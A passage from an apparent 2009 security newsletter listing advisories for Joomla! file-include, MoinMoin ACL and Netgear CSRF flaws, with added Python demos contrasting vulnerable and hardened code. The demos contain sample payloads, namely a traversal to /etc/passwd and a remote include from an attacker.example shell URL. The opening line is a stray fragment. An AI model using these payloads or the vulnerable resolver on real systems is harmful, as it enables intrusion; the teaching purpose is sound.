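The more common fix is an opaque random session id looked up server side, which also gives you expiry and revocation; the signed form is shown because it is self-contained and makes the failure of the forged and tampered cookies easy to test.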

  • 09.24.78 - CVE: Not Available
  • Platform: Web Application
  • Title: Multiple OrdaSoft Joomla! Components "mosConfig_absolute_path" Remote File Include
  • Description: OrdaSoft produces a number of components for the Joomla! content manager. Multiple OrdaSoft components are exposed to a remote file include issue because they fail to sufficiently sanitize user-supplied input to the "mosConfig_absolute_path" parameter of the "toolbar_ext.php" script.
  • Ref: http://www.securityfocus.com/bid/35269
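
Three Joomla! entries in this issue (Omilen Photo Gallery "controller", MooFAQ "file", and the OrdaSoft "mosConfig_absolute_path" above) are the same pattern: a request parameter is concatenated into an include path. The following added example (not the code of any of these components) shows the pattern in one resolver and the hardened resolver beside it. Parameter names come from the advisories; the directory layout, controller names and sample requests are constructed.

```python
"""Local and remote file include from request-controlled include paths.

Added example, not the named components' code. "controller" and
"mosConfig_absolute_path" are the advisory's parameter names; the rest is
constructed.
"""
import os
import tempfile

ALLOWED_CONTROLLERS = {"default", "gallery", "album"}


class IncludeError(Exception):
    """Raised by the hardened resolver instead of including anything."""


def resolve_include_vulnerable(base_dir, request):
    """The vulnerable shape: the base path can be overridden from the request
    (register_globals style, the RFI case) and the file name is concatenated
    unchecked (the LFI case)."""
    base = request.get("mosConfig_absolute_path", base_dir)
    name = request.get("controller", "default")
    return base + "/" + name + ".php"


def resolve_include_safe(base_dir, request):
    """Allowlist the name, never read the base from the request, and confirm
    the resolved real path still lies under base_dir."""
    name = request.get("controller", "default")
    if name not in ALLOWED_CONTROLLERS:
        raise IncludeError("unknown controller %r" % name)
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, name + ".php"))
    if os.path.commonpath([root, target]) != root:
        raise IncludeError("resolved path escapes %s" % root)
    return target


def is_rejected(base_dir, request):
    try:
        resolve_include_safe(base_dir, request)
    except IncludeError:
        return True
    return False


def escapes_base(base_dir, path):
    """Verification check: would this include path read outside base_dir or
    from a remote URL? Truncates at NUL the way PHP before 5.3.4 did."""
    if "://" in path:
        return True
    path = path.split("\x00", 1)[0]
    root = os.path.realpath(base_dir)
    return os.path.commonpath([root, os.path.realpath(path)]) != root


# Constructed requests: traversal with a NUL to drop the ".php" suffix (LFI),
# and a remote base whose trailing '?' turns the rest into a query (RFI).
LFI_REQUEST = {"controller": "../../../../../../../../etc/passwd\x00"}
RFI_REQUEST = {"mosConfig_absolute_path": "http://attacker.example/shell.txt?"}
GOOD_REQUEST = {"controller": "gallery"}


def run_demo():
    """Creates a throwaway component directory and exercises both resolvers."""
    base = tempfile.mkdtemp(prefix="com_demo_")
    for name in ALLOWED_CONTROLLERS:
        with open(os.path.join(base, name + ".php"), "w") as fh:
            fh.write("<?php // %s controller\n" % name)
    return {
        "lfi_vulnerable_escapes": escapes_base(
            base, resolve_include_vulnerable(base, LFI_REQUEST)),
        "rfi_vulnerable_remote": escapes_base(
            base, resolve_include_vulnerable(base, RFI_REQUEST)),
        "lfi_safe_rejected": is_rejected(base, LFI_REQUEST),
        "rfi_safe_ignores_base": os.path.basename(
            resolve_include_safe(base, RFI_REQUEST)),
        "good_safe": os.path.basename(resolve_include_safe(base, GOOD_REQUEST)),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-24s %s" % (key, value))
```

The allowlist alone closes both issues; the realpath check is kept so that a later developer who relaxes the allowlist to a pattern still cannot be walked out of the component directory.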

  • 09.24.79 - CVE: Not Available
  • Platform: Web Application
  • Title: MoinMoin Hierarchical ACL Security Bypass
  • Description: MoinMoin is a freely available, open-source wiki written in Python. It is available for Unix and Linux platforms. The application is exposed to a security bypass issue due to an error when processing hierarchical ACLs. MoinMoin version 1.8.3 is affected.
  • Ref: http://moinmo.in/MoinMoinRelease1.8

  • 09.24.80 - CVE: Not Available
  • Platform: Network Device
  • Title: Netgear RP614 Wireless Router Cross-Site Request Forgery
  • Description: The Netgear RP614 wireless router is a network device designed for home use. The router is exposed to a cross-site request forgery issue that exists in the web administration interface. Attackers can exploit this issue by tricking a victim who is logged in to the interface into visiting a malicious web page. The page contains specially crafted markup or script that makes the victim's browser submit an administrative request to the router on the attacker's behalf, with the victim's credentials attached automatically. Netgear RP614 running firmware 1.0.5_04.23 is affected.
  • Ref: http://holisticinfosec.org/content/view/116/45/
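
The following added example (not Netgear firmware, and not a description of the RP614's actual pages) shows why a cookie-authenticated configuration handler can be driven from another site, and the two server-side checks that stop it: a per-session token embedded in the router's own forms, and a check of the Origin/Referer header when one is present. The router address, the settings form and the attacker origin are constructed.

```python
"""CSRF against a cookie-authenticated admin handler, beside the fixed one.

Added example, not Netgear's code. Router origin, form fields and attacker
origin are constructed.
"""
import hmac
import secrets

ROUTER_ORIGIN = "http://192.168.0.1"  # constructed
SESSIONS = {}  # session id -> per-session state, held server side


def login():
    """Admin logs in: the browser gets a session cookie and every form the
    router renders afterwards carries this session's CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"csrf": secrets.token_urlsafe(32)}
    return sid


def set_dns_vulnerable(request, config):
    """Authenticated by the cookie alone: any page can make the browser send
    this request, and the cookie rides along."""
    if request["cookies"].get("session") not in SESSIONS:
        return 401
    config["dns"] = request["form"]["dns"]
    return 200


def _same_origin(source):
    return source == ROUTER_ORIGIN or source.startswith(ROUTER_ORIGIN + "/")


def set_dns_safe(request, config):
    sid = request["cookies"].get("session")
    if sid not in SESSIONS:
        return 401
    # Origin/Referer check when the browser supplies one; absent headers are
    # tolerated because the token below is the mandatory control.
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if source is not None and not _same_origin(source):
        return 403
    token = request["form"].get("csrf", "")
    expected = SESSIONS[sid]["csrf"]
    if not hmac.compare_digest(token.encode(), expected.encode()):
        return 403
    config["dns"] = request["form"]["dns"]
    return 200


def forged_request(sid):
    """What the victim's browser sends when the attacker's page auto-submits a
    form to the router: the cookie is attached, the token is unknown to the
    attacker, and the Origin is the attacker's site."""
    return {
        "cookies": {"session": sid},
        "headers": {"Origin": "http://attacker.example"},
        "form": {"dns": "198.51.100.53"},
    }


def legitimate_request(sid):
    return {
        "cookies": {"session": sid},
        "headers": {"Origin": ROUTER_ORIGIN},
        "form": {"dns": "9.9.9.9", "csrf": SESSIONS[sid]["csrf"]},
    }


def run_demo():
    config = {"dns": "192.168.0.1"}  # constructed settings store
    sid = login()
    out = {}
    out["vulnerable_forged"] = set_dns_vulnerable(forged_request(sid), config)
    out["dns_after_vulnerable"] = config["dns"]
    config["dns"] = "192.168.0.1"
    out["safe_forged"] = set_dns_safe(forged_request(sid), config)
    out["dns_after_safe_forged"] = config["dns"]
    out["safe_legitimate"] = set_dns_safe(legitimate_request(sid), config)
    out["dns_after_legitimate"] = config["dns"]
    out["safe_no_session"] = set_dns_safe(
        {"cookies": {}, "headers": {}, "form": {"dns": "1.1.1.1"}}, config)
    return out


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-24s %s" % (key, value))
```

The token is the primary control because an attacker's page cannot read it across origins; the Origin/Referer check is a cheap second layer, and is written to tolerate a missing header rather than break legitimate users whose browser or proxy strips Referer.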

(c) 2009. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.